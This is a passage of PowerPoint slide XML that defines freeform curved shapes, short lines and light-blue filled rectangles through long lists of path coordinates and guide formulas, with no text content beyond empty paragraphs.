                    <a:lnTo>
                      <a:pt x="0" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="396" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="261" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="0"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="14288">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10668" name="Line 75"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="2730"/>
                <a:ext cx="1" cy="48"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="14288">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10669" name="Line 76"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2828" y="2730"/>
                <a:ext cx="1" cy="48"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="14288">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10670" name="Rectangle 77"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2425" y="2730"/>
                <a:ext cx="400" cy="48"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="CCCCFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10671" name="Rectangle 78"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2660" y="2748"/>
                <a:ext cx="0" cy="123"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" altLang="en-US" sz="1800">
                    <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                    <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="en-US">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10672" name="Freeform 79"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2421" y="2674"/>
                <a:ext cx="404" cy="91"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 181 w 404"/>
                  <a:gd name="T1" fmla="*/ 0 h 91"/>
                  <a:gd name="T2" fmla="*/ 143 w 404"/>
                  <a:gd name="T3" fmla="*/ 3 h 91"/>
                  <a:gd name="T4" fmla="*/ 106 w 404"/>
                  <a:gd name="T5" fmla="*/ 6 h 91"/>
                  <a:gd name="T6" fmla="*/ 82 w 404"/>
                  <a:gd name="T7" fmla="*/ 10 h 91"/>
                  <a:gd name="T8" fmla="*/ 67 w 404"/>
                  <a:gd name="T9" fmla="*/ 12 h 91"/>
                  <a:gd name="T10" fmla="*/ 53 w 404"/>
                  <a:gd name="T11" fmla="*/ 15 h 91"/>
                  <a:gd name="T12" fmla="*/ 41 w 404"/>
                  <a:gd name="T13" fmla="*/ 19 h 91"/>
                  <a:gd name="T14" fmla="*/ 29 w 404"/>
                  <a:gd name="T15" fmla="*/ 22 h 91"/>
                  <a:gd name="T16" fmla="*/ 20 w 404"/>
                  <a:gd name="T17" fmla="*/ 26 h 91"/>
                  <a:gd name="T18" fmla="*/ 13 w 404"/>
                  <a:gd name="T19" fmla="*/ 29 h 91"/>
                  <a:gd name="T20" fmla="*/ 7 w 404"/>
                  <a:gd name="T21" fmla="*/ 34 h 91"/>
                  <a:gd name="T22" fmla="*/ 2 w 404"/>
                  <a:gd name="T23" fmla="*/ 39 h 91"/>
                  <a:gd name="T24" fmla="*/ 0 w 404"/>
                  <a:gd name="T25" fmla="*/ 43 h 91"/>
                  <a:gd name="T26" fmla="*/ 0 w 404"/>
                  <a:gd name="T27" fmla="*/ 48 h 91"/>
                  <a:gd name="T28" fmla="*/ 2 w 404"/>
                  <a:gd name="T29" fmla="*/ 53 h 91"/>
                  <a:gd name="T30" fmla="*/ 7 w 404"/>
                  <a:gd name="T31" fmla="*/ 57 h 91"/>
                  <a:gd name="T32" fmla="*/ 13 w 404"/>
                  <a:gd name="T33" fmla="*/ 61 h 91"/>
                  <a:gd name="T34" fmla="*/ 20 w 404"/>
                  <a:gd name="T35" fmla="*/ 66 h 91"/>
                  <a:gd name="T36" fmla="*/ 29 w 404"/>
                  <a:gd name="T37" fmla="*/ 69 h 91"/>
                  <a:gd name="T38" fmla="*/ 41 w 404"/>
                  <a:gd name="T39" fmla="*/ 73 h 91"/>
                  <a:gd name="T40" fmla="*/ 53 w 404"/>
                  <a:gd name="T41" fmla="*/ 76 h 91"/>
                  <a:gd name="T42" fmla="*/ 67 w 404"/>
                  <a:gd name="T43" fmla="*/ 80 h 91"/>
                  <a:gd name="T44" fmla="*/ 82 w 404"/>
                  <a:gd name="T45" fmla="*/ 82 h 91"/>
                  <a:gd name="T46" fmla="*/ 106 w 404"/>
                  <a:gd name="T47" fmla="*/ 85 h 91"/>
                  <a:gd name="T48" fmla="*/ 143 w 404"/>
                  <a:gd name="T49" fmla="*/ 89 h 91"/>
                  <a:gd name="T50" fmla="*/ 181 w 404"/>
                  <a:gd name="T51" fmla="*/ 91 h 91"/>
                  <a:gd name="T52" fmla="*/ 223 w 404"/>
                  <a:gd name="T53" fmla="*/ 91 h 91"/>
                  <a:gd name="T54" fmla="*/ 262 w 404"/>
                  <a:gd name="T55" fmla="*/ 89 h 91"/>
                  <a:gd name="T56" fmla="*/ 298 w 404"/>
                  <a:gd name="T57" fmla="*/ 85 h 91"/>
                  <a:gd name="T58" fmla="*/ 322 w 404"/>
                  <a:gd name="T59" fmla="*/ 82 h 91"/>
                  <a:gd name="T60" fmla="*/ 337 w 404"/>
                  <a:gd name="T61" fmla="*/ 80 h 91"/>
                  <a:gd name="T62" fmla="*/ 351 w 404"/>
                  <a:gd name="T63" fmla="*/ 76 h 91"/>
                  <a:gd name="T64" fmla="*/ 363 w 404"/>
                  <a:gd name="T65" fmla="*/ 73 h 91"/>
                  <a:gd name="T66" fmla="*/ 375 w 404"/>
                  <a:gd name="T67" fmla="*/ 69 h 91"/>
                  <a:gd name="T68" fmla="*/ 384 w 404"/>
                  <a:gd name="T69" fmla="*/ 66 h 91"/>
                  <a:gd name="T70" fmla="*/ 391 w 404"/>
                  <a:gd name="T71" fmla="*/ 61 h 91"/>
                  <a:gd name="T72" fmla="*/ 397 w 404"/>
                  <a:gd name="T73" fmla="*/ 57 h 91"/>
                  <a:gd name="T74" fmla="*/ 402 w 404"/>
                  <a:gd name="T75" fmla="*/ 53 h 91"/>
                  <a:gd name="T76" fmla="*/ 404 w 404"/>
                  <a:gd name="T77" fmla="*/ 48 h 91"/>
                  <a:gd name="T78" fmla="*/ 404 w 404"/>
                  <a:gd name="T79" fmla="*/ 43 h 91"/>
                  <a:gd name="T80" fmla="*/ 402 w 404"/>
                  <a:gd name="T81" fmla="*/ 39 h 91"/>
                  <a:gd name="T82" fmla="*/ 397 w 404"/>
                  <a:gd name="T83" fmla="*/ 34 h 91"/>
                  <a:gd name="T84" fmla="*/ 391 w 404"/>
                  <a:gd name="T85" fmla="*/ 29 h 91"/>
                  <a:gd name="T86" fmla="*/ 384 w 404"/>
                  <a:gd name="T87" fmla="*/ 26 h 91"/>
                  <a:gd name="T88" fmla="*/ 375 w 404"/>
                  <a:gd name="T89" fmla="*/ 22 h 91"/>
                  <a:gd name="T90" fmla="*/ 363 w 404"/>
                  <a:gd name="T91" fmla="*/ 19 h 91"/>
                  <a:gd name="T92" fmla="*/ 351 w 404"/>
                  <a:gd name="T93" fmla="*/ 15 h 91"/>
                  <a:gd name="T94" fmla="*/ 337 w 404"/>
                  <a:gd name="T95" fmla="*/ 12 h 91"/>
                  <a:gd name="T96" fmla="*/ 322 w 404"/>
                  <a:gd name="T97" fmla="*/ 10 h 91"/>
                  <a:gd name="T98" fmla="*/ 298 w 404"/>
                  <a:gd name="T99" fmla="*/ 6 h 91"/>
                  <a:gd name="T100" fmla="*/ 262 w 404"/>
                  <a:gd name="T101" fmla="*/ 3 h 91"/>
                  <a:gd name="T102" fmla="*/ 223 w 404"/>
                  <a:gd name="T103" fmla="*/ 0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4"/>
                  <a:gd name="T157" fmla="*/ 0 h 91"/>
                  <a:gd name="T158" fmla="*/ 404 w 404"/>
                  <a:gd name="T159" fmla="*/ 91 h 9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4" h="91">
                    <a:moveTo>
                      <a:pt x="202" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="181" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="391" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="344" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="298" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CCCCFF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="10673" name="Freeform 80"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2421" y="2674"/>
                <a:ext cx="404" cy="91"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 181 w 404"/>
                  <a:gd name="T1" fmla="*/ 0 h 91"/>
                  <a:gd name="T2" fmla="*/ 143 w 404"/>
                  <a:gd name="T3" fmla="*/ 3 h 91"/>
                  <a:gd name="T4" fmla="*/ 106 w 404"/>
                  <a:gd name="T5" fmla="*/ 6 h 91"/>
                  <a:gd name="T6" fmla="*/ 82 w 404"/>
                  <a:gd name="T7" fmla="*/ 10 h 91"/>
                  <a:gd name="T8" fmla="*/ 67 w 404"/>
                  <a:gd name="T9" fmla="*/ 12 h 91"/>
                  <a:gd name="T10" fmla="*/ 53 w 404"/>
                  <a:gd name="T11" fmla="*/ 15 h 91"/>
                  <a:gd name="T12" fmla="*/ 41 w 404"/>
                  <a:gd name="T13" fmla="*/ 19 h 91"/>
                  <a:gd name="T14" fmla="*/ 29 w 404"/>
                  <a:gd name="T15" fmla="*/ 22 h 91"/>
                  <a:gd name="T16" fmla="*/ 20 w 404"/>
                  <a:gd name="T17" fmla="*/ 26 h 91"/>
                  <a:gd name="T18" fmla="*/ 13 w 404"/>
                  <a:gd name="T19" fmla="*/ 29 h 91"/>
                  <a:gd name="T20" fmla="*/ 7 w 404"/>
                  <a:gd name="T21" fmla="*/ 34 h 91"/>
                  <a:gd name="T22" fmla="*/ 2 w 404"/>
                  <a:gd name="T23" fmla="*/ 39 h 91"/>
                  <a:gd name="T24" fmla="*/ 0 w 404"/>
                  <a:gd name="T25" fmla="*/ 43 h 91"/>
                  <a:gd name="T26" fmla="*/ 0 w 404"/>
                  <a:gd name="T27" fmla="*/ 48 h 91"/>
                  <a:gd name="T28" fmla="*/ 2 w 404"/>
                  <a:gd name="T29" fmla="*/ 53 h 91"/>
                  <a:gd name="T30" fmla="*/ 7 w 404"/>
                  <a:gd name="T31" fmla="*/ 57 h 91"/>
                  <a:gd name="T32" fmla="*/ 13 w 404"/>
                  <a:gd name="T33" fmla="*/ 61 h 91"/>
                  <a:gd name="T34" fmla="*/ 20 w 404"/>
                  <a:gd name="T35" fmla="*/ 66 h 91"/>
                  <a:gd name="T36" fmla="*/ 29 w 404"/>
                  <a:gd name="T37" fmla="*/ 69 h 91"/>
                  <a:gd name="T38" fmla="*/ 41 w 404"/>
                  <a:gd name="T39" fmla="*/ 73 h 91"/>
                  <a:gd name="T40" fmla="*/ 53 w 404"/>
                  <a:gd name="T41" fmla="*/ 76 h 91"/>
                  <a:gd name="T42" fmla="*/ 67 w 404"/>
                  <a:gd name="T43" fmla="*/ 80 h 91"/>
                  <a:gd name="T44" fmla="*/ 82 w 404"/>
                  <a:gd name="T45" fmla="*/ 82 h 91"/>
                  <a:gd name="T46" fmla="*/ 106 w 404"/>
                  <a:gd name="T47" fmla="*/ 85 h 91"/>
                  <a:gd name="T48" fmla="*/ 143 w 404"/>
                  <a:gd name="T49" fmla="*/ 89 h 91"/>
                  <a:gd name="T50" fmla="*/ 181 w 404"/>
                  <a:gd name="T51" fmla="*/ 91 h 91"/>
                  <a:gd name="T52" fmla="*/ 223 w 404"/>
                  <a:gd name="T53" fmla="*/ 91 h 91"/>
                  <a:gd name="T54" fmla="*/ 262 w 404"/>
                  <a:gd name="T55" fmla="*/ 89 h 91"/>
                  <a:gd name="T56" fmla="*/ 298 w 404"/>
                  <a:gd name="T57" fmla="*/ 85 h 91"/>
